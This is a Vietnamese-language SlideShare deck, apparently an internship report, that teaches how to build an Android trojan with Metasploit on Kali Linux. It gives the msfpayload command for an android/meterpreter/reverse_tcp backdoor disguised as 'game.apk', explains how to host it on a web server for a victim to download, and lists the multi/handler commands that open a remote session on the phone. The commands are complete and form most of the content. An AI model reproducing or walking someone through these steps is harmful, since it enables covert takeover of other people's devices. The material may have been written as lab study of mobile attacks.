SlideShare a Scribd company logo
1 of 6
Tạo mã độc và tấn công trên Kalilinux.
Ta sử dụng Metasploit framework trên Kali Linux để tạo một payload, khi máy android
tải về và mở payload lên thì sẽ bị xâm nhập và điều khiển. Nếu sử dụng máy ảo Kali
Linux bằng Virtualbox, đầu tiên ta thiết lập phần Network như sau:
Bước 1: Cài đặt mạng cho kalilinux.
Khởi động máy ảo, vào menu Machine->Setting , chọn thẻ Network.
Chọn cấu hình mạng phù hợp, ở đây ta chọn mạng Briged Adapter và card
mạng lan đang sử dụng, sau đó khởi động kalilinux,
Bước 2: Mở Console, gõ lệnh ifconfig để xem địa chỉ IP,
Bước 3: Tạo mã độc:
Gõ lệnh :
Msfpayload android/meterpreter/reverse_tcp lhost=<IP > lport=4444 R >
~/Desktop/game.apk
Thông số lhost chính là IP của máy attacker, còn lport là port listening của máy
attacker, có thể chọn port khác, không nên chọn các port thường dùng vì dễ
đụng cổng, còn game.apk chính tên file mã độc.
File apk sẽ được tạo ra ngoài desktop, đây chính là metasploit reverse_tcp
backdoor, ta copy vào thư mục var/www và khởi động webserver để share file
apk, ở victim sẽ vào địa chỉ http://<IP_attacker>/<filename>.apk để tải về.
Bước 4: Tấn công:
- Khởi động metasploit bằng lệnh msfconsole.
- Sau khi load msfconsole load xong, ta phải tao một handler để xử lý dữ liệu
truyền về bằng các lệnh sau :
use exploit/multi/handler => chọn handle để xử lý dữ liệu truyền về
set payload android/meterpreter/reverse_tcp => chọn payload tương
tự như lúc tạo mã độc
set lhost 192.168.10.104 => đây là IP của máy kalilinux như tạo mã độc.
set lport 4444 => port giống như tạo mã độc ở trên
exploit => bắt đầu tấn công
- Chờ máy victim tải file apk về cài đặt và chạy …
Bước 5: Tấn công:
Trên máy android, vào trình duyệt, truy cập vào địa chỉ
http://<ipattacker>/game.apk, tải file về và cài đặt, sau khi run ta có giao diện
sau:
- Tải mã độc trên android
- Cài đặt mã độc trên Android:
Khi đó, trên kali sẽ có 1 session được mở ra, tại đây chúng ta đã có thể xâm
nhập vào máy android.

More Related Content

What's hot

Tạo mã độc trên kali linux để xâm nhập android (mạng lan )
Tạo mã độc trên kali linux để xâm nhập android (mạng lan )Tạo mã độc trên kali linux để xâm nhập android (mạng lan )
Tạo mã độc trên kali linux để xâm nhập android (mạng lan )Trọng An
 
Tuần 3 tạo mã độc trên kali linux
Tuần 3   tạo mã độc trên kali linuxTuần 3   tạo mã độc trên kali linux
Tuần 3 tạo mã độc trên kali linuxHường Tô
 
Cài đặt trojan cho android
Cài đặt trojan cho androidCài đặt trojan cho android
Cài đặt trojan cho androidthach28
 
Hack android dùng metasploit cài trên VPS
Hack android dùng metasploit cài trên VPSHack android dùng metasploit cài trên VPS
Hack android dùng metasploit cài trên VPSLê Lãnh
 
BÁO CÁO THỰC TẬP ATHENA - TUẦN 6
BÁO CÁO THỰC TẬP ATHENA - TUẦN 6BÁO CÁO THỰC TẬP ATHENA - TUẦN 6
BÁO CÁO THỰC TẬP ATHENA - TUẦN 6phanconghien
 
Part 38 isa server - intrusion detection -www.key4_vip.info
Part 38   isa server - intrusion detection -www.key4_vip.infoPart 38   isa server - intrusion detection -www.key4_vip.info
Part 38 isa server - intrusion detection -www.key4_vip.infolaonap166
 
Vũ Thanh Hiếu tạo mã độc trên kali linux để xâm nhập android
Vũ Thanh Hiếu   tạo mã độc trên kali linux để xâm nhập androidVũ Thanh Hiếu   tạo mã độc trên kali linux để xâm nhập android
Vũ Thanh Hiếu tạo mã độc trên kali linux để xâm nhập androidAnh Hiếu
 
Cách tạo mã độc trên kali linux và triển khai trên android ảo
Cách tạo mã độc trên kali linux và triển khai trên android ảoCách tạo mã độc trên kali linux và triển khai trên android ảo
Cách tạo mã độc trên kali linux và triển khai trên android ảothach28
 
HƯỚNG DẪN KIỂM TRA MÃ ĐỘC DOUBLEPULSAR CỦA NSA
HƯỚNG DẪN KIỂM TRA MÃ ĐỘC DOUBLEPULSAR CỦA NSAHƯỚNG DẪN KIỂM TRA MÃ ĐỘC DOUBLEPULSAR CỦA NSA
HƯỚNG DẪN KIỂM TRA MÃ ĐỘC DOUBLEPULSAR CỦA NSAlaonap166
 
Tạo mã độc trên vps để xâm nhập android - Nguyen Xuan Ngoc
Tạo mã độc trên vps để xâm nhập android - Nguyen Xuan NgocTạo mã độc trên vps để xâm nhập android - Nguyen Xuan Ngoc
Tạo mã độc trên vps để xâm nhập android - Nguyen Xuan NgocXuân Ngọc Nguyễn
 
Bao cao tuan 4
Bao cao tuan 4Bao cao tuan 4
Bao cao tuan 4Phuong Ngo
 
Mạng bot net nền tảng
Mạng bot net nền tảngMạng bot net nền tảng
Mạng bot net nền tảngThieu Mao
 
BÁO CÁO THỰC TẬP - TUẦN 5
BÁO CÁO THỰC TẬP - TUẦN 5BÁO CÁO THỰC TẬP - TUẦN 5
BÁO CÁO THỰC TẬP - TUẦN 5kakawpah0911
 
Tạo mã độc trên vps
Tạo mã độc trên vpsTạo mã độc trên vps
Tạo mã độc trên vpsHường Tô
 
Nghiên cứu các chương trình có mã độc trên android và nghiên cứu cài đặt bac...
Nghiên cứu các chương trình có mã độc trên android  và nghiên cứu cài đặt bac...Nghiên cứu các chương trình có mã độc trên android  và nghiên cứu cài đặt bac...
Nghiên cứu các chương trình có mã độc trên android và nghiên cứu cài đặt bac...Nguyen Anh
 
Cài đặt kali linux trên máy ảo VMware
Cài đặt kali linux trên máy ảo VMwareCài đặt kali linux trên máy ảo VMware
Cài đặt kali linux trên máy ảo VMwareNguyen Stone
 
Slide bao cao giua ki
Slide bao cao giua ki Slide bao cao giua ki
Slide bao cao giua ki thach28
 

What's hot (20)

Tạo mã độc trên kali linux để xâm nhập android (mạng lan )
Tạo mã độc trên kali linux để xâm nhập android (mạng lan )Tạo mã độc trên kali linux để xâm nhập android (mạng lan )
Tạo mã độc trên kali linux để xâm nhập android (mạng lan )
 
Tuần 3 tạo mã độc trên kali linux
Tuần 3   tạo mã độc trên kali linuxTuần 3   tạo mã độc trên kali linux
Tuần 3 tạo mã độc trên kali linux
 
Cài đặt trojan cho android
Cài đặt trojan cho androidCài đặt trojan cho android
Cài đặt trojan cho android
 
Hack android dùng metasploit cài trên VPS
Hack android dùng metasploit cài trên VPSHack android dùng metasploit cài trên VPS
Hack android dùng metasploit cài trên VPS
 
BÁO CÁO THỰC TẬP ATHENA - TUẦN 6
BÁO CÁO THỰC TẬP ATHENA - TUẦN 6BÁO CÁO THỰC TẬP ATHENA - TUẦN 6
BÁO CÁO THỰC TẬP ATHENA - TUẦN 6
 
Part 38 isa server - intrusion detection -www.key4_vip.info
Part 38   isa server - intrusion detection -www.key4_vip.infoPart 38   isa server - intrusion detection -www.key4_vip.info
Part 38 isa server - intrusion detection -www.key4_vip.info
 
Bao cao tuan 3
Bao cao tuan 3Bao cao tuan 3
Bao cao tuan 3
 
Vũ Thanh Hiếu tạo mã độc trên kali linux để xâm nhập android
Vũ Thanh Hiếu   tạo mã độc trên kali linux để xâm nhập androidVũ Thanh Hiếu   tạo mã độc trên kali linux để xâm nhập android
Vũ Thanh Hiếu tạo mã độc trên kali linux để xâm nhập android
 
Bao cao tuan 6 7 8
Bao cao tuan 6 7 8Bao cao tuan 6 7 8
Bao cao tuan 6 7 8
 
Cách tạo mã độc trên kali linux và triển khai trên android ảo
Cách tạo mã độc trên kali linux và triển khai trên android ảoCách tạo mã độc trên kali linux và triển khai trên android ảo
Cách tạo mã độc trên kali linux và triển khai trên android ảo
 
tao ma doc ten vps
tao ma doc ten vpstao ma doc ten vps
tao ma doc ten vps
 
HƯỚNG DẪN KIỂM TRA MÃ ĐỘC DOUBLEPULSAR CỦA NSA
HƯỚNG DẪN KIỂM TRA MÃ ĐỘC DOUBLEPULSAR CỦA NSAHƯỚNG DẪN KIỂM TRA MÃ ĐỘC DOUBLEPULSAR CỦA NSA
HƯỚNG DẪN KIỂM TRA MÃ ĐỘC DOUBLEPULSAR CỦA NSA
 
Tạo mã độc trên vps để xâm nhập android - Nguyen Xuan Ngoc
Tạo mã độc trên vps để xâm nhập android - Nguyen Xuan NgocTạo mã độc trên vps để xâm nhập android - Nguyen Xuan Ngoc
Tạo mã độc trên vps để xâm nhập android - Nguyen Xuan Ngoc
 
Bao cao tuan 4
Bao cao tuan 4Bao cao tuan 4
Bao cao tuan 4
 
Mạng bot net nền tảng
Mạng bot net nền tảngMạng bot net nền tảng
Mạng bot net nền tảng
 
BÁO CÁO THỰC TẬP - TUẦN 5
BÁO CÁO THỰC TẬP - TUẦN 5BÁO CÁO THỰC TẬP - TUẦN 5
BÁO CÁO THỰC TẬP - TUẦN 5
 
Tạo mã độc trên vps
Tạo mã độc trên vpsTạo mã độc trên vps
Tạo mã độc trên vps
 
Nghiên cứu các chương trình có mã độc trên android và nghiên cứu cài đặt bac...
Nghiên cứu các chương trình có mã độc trên android  và nghiên cứu cài đặt bac...Nghiên cứu các chương trình có mã độc trên android  và nghiên cứu cài đặt bac...
Nghiên cứu các chương trình có mã độc trên android và nghiên cứu cài đặt bac...
 
Cài đặt kali linux trên máy ảo VMware
Cài đặt kali linux trên máy ảo VMwareCài đặt kali linux trên máy ảo VMware
Cài đặt kali linux trên máy ảo VMware
 
Slide bao cao giua ki
Slide bao cao giua ki Slide bao cao giua ki
Slide bao cao giua ki
 

Viewers also liked

eBay Mobile Strategy Overview
eBay Mobile Strategy OvervieweBay Mobile Strategy Overview
eBay Mobile Strategy OverviewSunny Lam
 
The operational amplifier (part 2)
The operational amplifier (part 2)The operational amplifier (part 2)
The operational amplifier (part 2)Jamil Ahmed
 
Amplifier frequency response(part 1)
Amplifier frequency response(part 1)Amplifier frequency response(part 1)
Amplifier frequency response(part 1)Jamil Ahmed
 
The operational amplifier (part 1)
The operational amplifier (part 1)The operational amplifier (part 1)
The operational amplifier (part 1)Jamil Ahmed
 
Amplifier frequency response (part 2)
Amplifier frequency response (part 2)Amplifier frequency response (part 2)
Amplifier frequency response (part 2)Jamil Ahmed
 
Basic op amp circuits
Basic op amp circuitsBasic op amp circuits
Basic op amp circuitsJamil Ahmed
 

Viewers also liked (8)

bao cao athena tuan 1
bao cao athena tuan 1bao cao athena tuan 1
bao cao athena tuan 1
 
Windows 7
Windows 7Windows 7
Windows 7
 
eBay Mobile Strategy Overview
eBay Mobile Strategy OvervieweBay Mobile Strategy Overview
eBay Mobile Strategy Overview
 
The operational amplifier (part 2)
The operational amplifier (part 2)The operational amplifier (part 2)
The operational amplifier (part 2)
 
Amplifier frequency response(part 1)
Amplifier frequency response(part 1)Amplifier frequency response(part 1)
Amplifier frequency response(part 1)
 
The operational amplifier (part 1)
The operational amplifier (part 1)The operational amplifier (part 1)
The operational amplifier (part 1)
 
Amplifier frequency response (part 2)
Amplifier frequency response (part 2)Amplifier frequency response (part 2)
Amplifier frequency response (part 2)
 
Basic op amp circuits
Basic op amp circuitsBasic op amp circuits
Basic op amp circuits
 

Similar to tao ma doc tren kalilinux

BÁO CÁO THỰC TẬP - TUẦN 3-4
BÁO CÁO THỰC TẬP - TUẦN 3-4BÁO CÁO THỰC TẬP - TUẦN 3-4
BÁO CÁO THỰC TẬP - TUẦN 3-4kakawpah0911
 
Vũ thanh hiếu tạo mã độc trên vps tấn công android
Vũ thanh hiếu   tạo mã độc trên vps tấn công androidVũ thanh hiếu   tạo mã độc trên vps tấn công android
Vũ thanh hiếu tạo mã độc trên vps tấn công androidAnh Hiếu
 
BÁO CÁO THỰC TẬP ATHENA - BÁO CÁO GIỮA KỲ
BÁO CÁO THỰC TẬP ATHENA - BÁO CÁO GIỮA KỲBÁO CÁO THỰC TẬP ATHENA - BÁO CÁO GIỮA KỲ
BÁO CÁO THỰC TẬP ATHENA - BÁO CÁO GIỮA KỲphanconghien
 
BÁO CÁO THỰC TẬP - GIỮA KỲ
BÁO CÁO THỰC TẬP - GIỮA KỲBÁO CÁO THỰC TẬP - GIỮA KỲ
BÁO CÁO THỰC TẬP - GIỮA KỲkakawpah0911
 
ATHENA - Nguyen Xuan Ngoc - Tuan 3,4
ATHENA - Nguyen Xuan Ngoc - Tuan 3,4ATHENA - Nguyen Xuan Ngoc - Tuan 3,4
ATHENA - Nguyen Xuan Ngoc - Tuan 3,4Xuân Ngọc Nguyễn
 
BÁO CÁO THỰC TẬP - TUẦN 6
BÁO CÁO THỰC TẬP - TUẦN 6BÁO CÁO THỰC TẬP - TUẦN 6
BÁO CÁO THỰC TẬP - TUẦN 6kakawpah0911
 
INT1484-Bai-thuc-hanh-01.pdf
INT1484-Bai-thuc-hanh-01.pdfINT1484-Bai-thuc-hanh-01.pdf
INT1484-Bai-thuc-hanh-01.pdfPhamTruongGiang4
 
Cài đặt Genmymotion
 Cài đặt Genmymotion Cài đặt Genmymotion
Cài đặt GenmymotionTrọng An
 

Similar to tao ma doc tren kalilinux (20)

Kali Linux
Kali LinuxKali Linux
Kali Linux
 
BÁO CÁO THỰC TẬP - TUẦN 3-4
BÁO CÁO THỰC TẬP - TUẦN 3-4BÁO CÁO THỰC TẬP - TUẦN 3-4
BÁO CÁO THỰC TẬP - TUẦN 3-4
 
Bao cao vps
Bao cao vpsBao cao vps
Bao cao vps
 
Vũ thanh hiếu tạo mã độc trên vps tấn công android
Vũ thanh hiếu   tạo mã độc trên vps tấn công androidVũ thanh hiếu   tạo mã độc trên vps tấn công android
Vũ thanh hiếu tạo mã độc trên vps tấn công android
 
Tuan2
Tuan2Tuan2
Tuan2
 
BÁO CÁO THỰC TẬP ATHENA - BÁO CÁO GIỮA KỲ
BÁO CÁO THỰC TẬP ATHENA - BÁO CÁO GIỮA KỲBÁO CÁO THỰC TẬP ATHENA - BÁO CÁO GIỮA KỲ
BÁO CÁO THỰC TẬP ATHENA - BÁO CÁO GIỮA KỲ
 
BÁO CÁO THỰC TẬP - GIỮA KỲ
BÁO CÁO THỰC TẬP - GIỮA KỲBÁO CÁO THỰC TẬP - GIỮA KỲ
BÁO CÁO THỰC TẬP - GIỮA KỲ
 
Bao cao
Bao caoBao cao
Bao cao
 
ATHENA - Nguyen Xuan Ngoc - Tuan 3,4
ATHENA - Nguyen Xuan Ngoc - Tuan 3,4ATHENA - Nguyen Xuan Ngoc - Tuan 3,4
ATHENA - Nguyen Xuan Ngoc - Tuan 3,4
 
BÁO CÁO THỰC TẬP - TUẦN 6
BÁO CÁO THỰC TẬP - TUẦN 6BÁO CÁO THỰC TẬP - TUẦN 6
BÁO CÁO THỰC TẬP - TUẦN 6
 
ATHENA - Nguyen Xuan Ngoc - Giua Ky
ATHENA - Nguyen Xuan Ngoc - Giua KyATHENA - Nguyen Xuan Ngoc - Giua Ky
ATHENA - Nguyen Xuan Ngoc - Giua Ky
 
1
11
1
 
Kali Linux
Kali LinuxKali Linux
Kali Linux
 
Bao cao tuan 4
Bao cao tuan 4Bao cao tuan 4
Bao cao tuan 4
 
Tuan 3
Tuan 3Tuan 3
Tuan 3
 
Baocaocuoiki
BaocaocuoikiBaocaocuoiki
Baocaocuoiki
 
INT1484-Bai-thuc-hanh-01.pdf
INT1484-Bai-thuc-hanh-01.pdfINT1484-Bai-thuc-hanh-01.pdf
INT1484-Bai-thuc-hanh-01.pdf
 
Bai bao cao 4
Bai bao cao 4Bai bao cao 4
Bai bao cao 4
 
Genmymotion
GenmymotionGenmymotion
Genmymotion
 
Cài đặt Genmymotion
 Cài đặt Genmymotion Cài đặt Genmymotion
Cài đặt Genmymotion
 

tao ma doc tren kalilinux

  • 1. Tạo mã độc và tấn công trên Kalilinux. Ta sử dụng Metasploit framework trên Kali Linux để tạo một payload, khi máy android tải về và mở payload lên thì sẽ bị xâm nhập và điều khiển. Nếu sử dụng máy ảo Kali Linux bằng Virtualbox, đầu tiên ta thiết lập phần Network như sau: Bước 1: Cài đặt mạng cho kalilinux. Khởi động máy ảo, vào menu Machine->Setting , chọn thẻ Network. Chọn cấu hình mạng phù hợp, ở đây ta chọn mạng Briged Adapter và card mạng lan đang sử dụng, sau đó khởi động kalilinux,
  • 2. Bước 2: Mở Console, gõ lệnh ifconfig để xem địa chỉ IP, Bước 3: Tạo mã độc: Gõ lệnh : Msfpayload android/meterpreter/reverse_tcp lhost=<IP > lport=4444 R > ~/Desktop/game.apk Thông số lhost chính là IP của máy attacker, còn lport là port listening của máy attacker, có thể chọn port khác, không nên chọn các port thường dùng vì dễ đụng cổng, còn game.apk chính tên file mã độc.
  • 3. File apk sẽ được tạo ra ngoài desktop, đây chính là metasploit reverse_tcp backdoor, ta copy vào thư mục var/www và khởi động webserver để share file apk, ở victim sẽ vào địa chỉ http://<IP_attacker>/<filename>.apk để tải về. Bước 4: Tấn công: - Khởi động metasploit bằng lệnh msfconsole.
  • 4. - Sau khi load msfconsole load xong, ta phải tao một handler để xử lý dữ liệu truyền về bằng các lệnh sau : use exploit/multi/handler => chọn handle để xử lý dữ liệu truyền về set payload android/meterpreter/reverse_tcp => chọn payload tương tự như lúc tạo mã độc set lhost 192.168.10.104 => đây là IP của máy kalilinux như tạo mã độc. set lport 4444 => port giống như tạo mã độc ở trên exploit => bắt đầu tấn công - Chờ máy victim tải file apk về cài đặt và chạy …
  • 5. Bước 5: Tấn công: Trên máy android, vào trình duyệt, truy cập vào địa chỉ http://<ipattacker>/game.apk, tải file về và cài đặt, sau khi run ta có giao diện sau: - Tải mã độc trên android - Cài đặt mã độc trên Android:
  • 6. Khi đó, trên kali sẽ có 1 session được mở ra, tại đây chúng ta đã có thể xâm nhập vào máy android.